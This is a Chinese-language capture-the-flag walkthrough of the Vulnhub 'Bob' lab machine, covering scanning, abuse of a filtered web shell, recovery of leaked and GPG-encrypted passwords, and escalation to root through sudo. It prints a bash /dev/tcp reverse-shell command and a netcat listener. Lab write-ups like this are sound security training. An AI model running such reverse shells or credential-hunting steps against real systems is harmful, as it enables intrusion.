Vulnhub之Bob靶机详细测试过程
Bob
作者:jason_huawen
靶机信息
名称:Bob: 1.0.1
地址:
https://www.vulnhub.com/entry/bob-101,226/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:a5:49:23 1 60 PCS Systemtechnik GmbH
192.168.56.101 08:00:27:6f:48:2f 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.101
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.101 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 05:06 EST
Nmap scan report for 192.168.56.101
Host is up (0.00035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84f2f8e5ed3e14f393d41e4c413ba2a9 (RSA)
| 256 5b98c74f846efd566a351683aa9ceaf8 (ECDSA)
|_ 256 391656fb4e0f508540d3532241433815 (ED25519)
MAC Address: 08:00:27:6F:48:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.11 seconds
NMAP扫描结果表明目标主机有2个开放端口:80(HTTP)、25468(SSH)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/lat_memo.html
<html>
<body>
<div id="back">
<div id="banner" alt="School Banner">
<img src="school_badge.png" id="logo">
<div id="bannertext">
<h1> Milburg Highschool </h1>
<a href="index.html">Home</a>
<a href="news.html">News</a>
<a href="about.html">About Us</a>
<a href="contact.html">Contact Us</a>
<a href="login.html">Login</a>
</div>
</div>
<div id="memocontainer">
<p>
Memo sent at GMT+10:00 2:37:42 by User: Bob
<br>
Hey guys IT here don't forget to check your emails regarding the recent security breach.
There is a web shell running on the server with no protection but it should be safe as
I have ported over the filter from the old windows server to our new linux one. Your email
will have the link to the shell.<br>
<br>
-Bob
</p>
</div>
</div>
</body>
</html>
表明用户名为bob,命令执行功能有过滤机制
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/passwords.html
<!-- N.T.S Get Sticky Notes to Write Passwords in
-Bob
-->
<!--
-=====Passwords:==-<!
=======-
-->
<!--
-=====WEBSHELL=======-
-->
<!--p
-->
<!--
-====================-
-->
<html>
<body>
Really who made this file at least get a hash of your password to display,
hackers can't do anything with a hash, this is probably why we had a security
breach in the first place. Comeon
people this is basic 101 security! I have moved the file off the server. Don't make me have to clean up the mess everytime
someone does something as stupid as this. We will have a meeting about this and other
stuff I found on the server. >:(
<br>
-Bob
</fieldset>
</body>
</html>
难道这个就是bob的密码,无论如何,先尝试一下
──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ssh bob@192.168.56.101 -p 25468
The authenticity of host '[192.168.56.101]:25468 ([192.168.56.101]:25468)' can't be established.
ED25519 key fingerprint is SHA256:OY3LVMIRHTASgrwg8mXjqq8nFPrcwLV7lhRz0gpjwq4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.101]:25468' (ED25519) to the list of known hosts.
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/
bob@192.168.56.101's password:
Permission denied, please try again.
bob@192.168.56.101's password:
Permission denied, please try again.
bob@192.168.56.101's password:
似乎不对,那再来看一下web shell
看来过滤机制很弱,试了几个就可以成功得到shell
bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'
在Kali Linux得到反弹回来的shell
──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.101] 36358
bash: cannot set terminal process group (514): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Milburg-High:/var/www/html$
www-data@Milburg-High:/var/www/html$ cat .hint
cat .hint
Have you tried spawning a tty shell?
Also don't forget to check for hidden files ;)
www-data@Milburg-High:/var/www/html$ which python
which python
/usr/bin/python
www-data@Milburg-High:/var/www/html$ python -c 'import pty;pty.spawn("/bin/bash")'
<html$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Milburg-High:/var/www/html$
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh中每句的第一个字母合起来就是HARPOCRATES,是个古希腊神话人物的名字。
www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
这里有jc等用户的密码
但是直接在目标主机执行gpg解密会出错:
jc@Milburg-High:/home/bob/Documents$ gpg --decrypt /home/bob/Documents/login.txt.gpg
<ts$ gpg --decrypt /home/bob/Documents/login.txt.gpg
gpg: AES encrypted data
gpg: problem with the agent: Permission denied
gpg: encrypted with 1 passphrase
gpg: decryption failed: No secret key
可将Login.txt.gpg文件下载到Kali linux本地进行解密
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ wget http://192.168.56.101:8000/login.txt.gpg
--2023-02-01 05:38:50-- http://192.168.56.101:8000/login.txt.gpg
Connecting to 192.168.56.101:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [application/octet-stream]
Saving to: ‘login.txt.gpg’
login.txt.gpg 100%[=====================================================>] 91 --.-KB/s in 0s
2023-02-01 05:38:50 (28.0 MB/s) - ‘login.txt.gpg’ saved [91/91]
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ls
linpeas.sh login.txt.gpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ gpg -d login.txt.gpg
gpg: keybox '/home/kali/.gnupg/pubring.kbx' created
gpg: AES.CFB encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
成功得到bob的密码。
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ssh bob@192.168.56.101 -p 25468
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/
bob@192.168.56.101's password:
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 8 23:49:12 2018 from 192.168.56.1
bob@Milburg-High:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob),27(sudo)
bob@Milburg-High:~$ sudo -l
sudo: unable to resolve host Milburg-High: Connection refused
[sudo] password for bob:
Matching Defaults entries for bob on Milburg-High:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on Milburg-High:
(ALL : ALL) ALL
bob@Milburg-High:~$ sudo /bin/bash
sudo: unable to resolve host Milburg-High: Connection refused
root@Milburg-High:/home/bob# cd /root
STRIVE FOR PROGRESS,NOT FOR PERFECTION
